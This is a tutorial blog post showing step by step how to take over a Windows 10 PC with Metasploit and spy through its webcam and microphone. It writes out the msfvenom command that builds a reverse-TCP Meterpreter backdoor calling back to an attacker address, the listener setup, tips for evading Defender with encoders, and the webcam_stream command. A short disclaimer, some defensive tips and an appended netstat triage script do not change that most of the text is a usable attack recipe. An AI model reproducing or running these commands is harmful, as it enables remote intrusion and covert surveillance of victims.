How to Hack a Windows 10 User’s (Webcam, Microphone etc) & Exploit Them using Metasploit Remotely
Cover image: AI-generated picture of a hacker in the dark (Wikimedia Commons: Matankic)
Disclaimer: This article is for educational purposes and seeks to promote ethical hacking and superior cybersecurity practices in organizations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks.
Do you ever fancy hacking someone's webcam (ethically, if you are here) or seeing what they are currently doing on their screen? Or getting hold of their microphone? Well, if they are using Windows 10 you may be in for a bread-and-butter session. In this tutorial we will use a reverse TCP payload: the Windows 10 target connects back to our listener on port 4444 rather than our machine connecting to it. You can read about reverse TCP connections here. As usual, I will hack my Windows 10 machine using my laptop's Kali Linux.
Requirements
- Kali Linux PC — Attacker
- Windows 10 — Target
- A USB stick — To deliver the backdoor window.exe (it can also be delivered wirelessly, embedded in an Adobe file)
Prerequisites
Install the Metasploit Framework on your Kali machine; the basic command is
apt-get install metasploit-framework (the package name on Kali). Also, you can watch this video in case you get lost. You need to open two terminals and su to root in one of them to launch the Metasploit Framework. (The two devices need to be connected to the same network):
- The first step is to create a payload using msfvenom. We also encode it to try to get past Windows 10 Defender (note that msfvenom encoders transform the bytes; they are not encryption). We can also manually allow the generated .exe as a legitimate file in Defender. The command for generating the payload is below:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.104 -a x64 LPORT=4444 -f exe > window.exe
-p: The payload to generate, which in our case is a Windows payload
windows/x64/meterpreter_reverse_tcp: The reverse TCP Meterpreter payload we are using. To learn which payload to select if your target architecture is different, open the other tab and type msfconsole to boot up the Metasploit Framework, then type: search type:exploit platform:windows
-a x64: Our target architecture; the Windows 10 machine is 64-bit
LHOST: Our IP address (run ifconfig on Kali to determine it)
(Optional) -e x86/shikata_ga_nai: We can run window.exe through this encoder to try to bypass Windows 10 Defender. Encoding is not encryption, and a well-known encoder like this one is routinely signatured, so expect Defender to flag the file anyway. It is, obviously, a virus; for the purpose of the demo, allow it onto the PC.
LPORT: The listening port, which in this case is 4444
-f exe: The output format. We are creating the payload as a .exe file that the user needs to execute, saved here as window.exe. Real attackers mostly embed the .exe in fancy-looking programs, PDFs or malicious links that unsuspecting victims open; that requires advanced mastery of tools such as evilpdf and is not covered here.
- Transfer window.exe to the target Windows 10 PC. We will use a USB stick for the transfer to keep the tutorial simple. As written above, embedding the .exe inside other innocuous-looking files or programs is a more advanced topic.
- Boot up the Metasploit Framework and configure the handler for the payload. Our payload is Meterpreter, a post-exploitation tool used in penetration testing.
use exploit/multi/handler → We are catching a connection that the target initiates, so we use the generic handler module located under multi/handler
set payload windows/x64/meterpreter_reverse_tcp → We generated the payload with this module in step one, so the handler must be told to expect the same payload
set LHOST 192.168.0.104 → We need to set our host again; after the preceding step, show options usually shows the LHOST field empty
show options → To identify any missing values. Confirm that LHOST and LPORT are not empty (both are required before exploitation)
- Time to run the handler and establish a Meterpreter session. Go back to the Windows 10 PC and double-click the window.exe file we copied from the USB stick, then observe the Kali window after typing run (or exploit). It should report "Meterpreter session started", as quoted in the figure below. It is advisable to turn off Windows Defender for the hacking session. I am devising ways of engulfing the .exe to appear legitimate and non-traceable.
run
- We now have control of the Windows 10 PC, since our prompt has changed to meterpreter>. You can type help to view the available commands and take note of the ones you want to use. You can also study how to capture audio or observe a remote screen-sharing session. To finally hack the webcam of the Windows 10 machine, just type
webcam_stream
Follow-up Notes:
- To avoid detection, we needed to encode our payload (window.exe) to bypass Windows 10 Defender.
Recommendations
- Organisations should enact strong policies against bringing USB devices from external sources into the environment, and deploy up-to-date anti-virus and endpoint protection that detects illegitimate keyloggers and backdoors, including those arriving as email attachments.
- Always keep an eye on Task Manager for applications that seem off. Bear in mind that most such payloads are crafted to mimic legitimate PC apps, so look at where the image runs from and what it is connected to, not just its name.
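To make the Task Manager recommendation concrete, here is a small triage script. It is an added example and is not code from the original article; it parses constructed `netstat -ano` output and a constructed PID-to-image-path map (the kind of data an administrator reads off Task Manager's Details tab) and flags established connections that combine an uncommon remote port with an executable running from a removable drive or a user-writable folder. The drive-letter rule assumes C: is the only fixed drive; the allowlist of "common" ports and the scoring threshold are also assumptions chosen for the example. On the sample data, the only hit is the process reaching 192.168.0.104:4444 from E:\window.exe, which is exactly the session the tutorial sets up.

```python
"""Triage Windows netstat output for the kind of reverse-TCP session
described in the article. Added example; not code from the original post."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of Windows `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.0.110:49712    192.168.0.104:4444     ESTABLISHED     5120
  TCP    192.168.0.110:49730    52.96.0.1:443          ESTABLISHED     3348
  TCP    192.168.0.110:49801    192.168.0.1:445        ESTABLISHED     4
  UDP    0.0.0.0:5353           *:*                                    1204
"""

# Constructed PID -> image path map, as read from Task Manager's Details tab
# ("Image path name" column) or `Get-Process | Select-Object Id, Path`.
PID_PATHS = {
    912: r"C:\Windows\System32\svchost.exe",
    5120: r"E:\window.exe",  # launched straight from the USB stick
    3348: r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
    4: "System",
    1204: r"C:\Windows\System32\svchost.exe",
}

# Remote ports a workstation routinely talks to (assumed allowlist for the example).
COMMON_REMOTE_PORTS = {53, 80, 443, 445, 465, 587, 993, 995, 3389}

# Path fragments that mean "a user dropped this here" rather than "installed software".
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\downloads\\", "\\appdata\\")

LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+"
    r"(ESTABLISHED|LISTENING|CLOSE_WAIT|TIME_WAIT|SYN_SENT)?\s*(\d+)\s*$",
    re.IGNORECASE,
)


@dataclass
class Connection:
    proto: str
    local: str
    remote_host: str
    remote_port: Optional[int]
    state: str
    pid: int


def parse_netstat(text: str) -> list:
    """Turn `netstat -ano` lines into Connection records; header lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        host, _, port = foreign.rpartition(":")
        conns.append(Connection(
            proto=proto.upper(), local=local, remote_host=host,
            remote_port=int(port) if port.isdigit() else None,
            state=(state or "").upper(), pid=int(pid),
        ))
    return conns


def score_connection(conn: Connection, image_path: str):
    """Return (score, reasons) for one connection; only live sessions earn points."""
    reasons = []
    if conn.state != "ESTABLISHED":
        return 0, reasons
    if conn.remote_port not in COMMON_REMOTE_PORTS:
        reasons.append(f"uncommon remote port {conn.remote_port}")
    low = image_path.lower()
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        reasons.append(f"image runs from user-writable path {image_path}")
    # Assumption for this example: C: is the only fixed drive, so any other
    # drive letter is removable or network storage.
    if re.match(r"^[a-bd-z]:\\", low):
        reasons.append(f"image runs from non-system drive {image_path[:2]}")
    return len(reasons), reasons


def find_suspicious(netstat_text: str, pid_paths: dict, threshold: int = 2) -> list:
    """Connections whose score reaches the threshold, with the reasons attached."""
    hits = []
    for conn in parse_netstat(netstat_text):
        image = pid_paths.get(conn.pid, "<unknown>")
        score, reasons = score_connection(conn, image)
        if score >= threshold:
            hits.append({"pid": conn.pid, "image": image,
                         "remote": f"{conn.remote_host}:{conn.remote_port}",
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(NETSTAT_SAMPLE, PID_PATHS):
        print(f"PID {hit['pid']} ({hit['image']}) -> {hit['remote']}: "
              + "; ".join(hit["reasons"]))
```

The scoring deliberately requires two independent signals before reporting anything: a single odd port is noisy on its own (developer tools, games and VPN clients all use them), but an odd port combined with an executable that was never installed is the pattern the USB-delivered backdoor in this tutorial produces. Swap the constructed samples for the real output of `netstat -ano` and a PID-to-path listing to run it against a live machine.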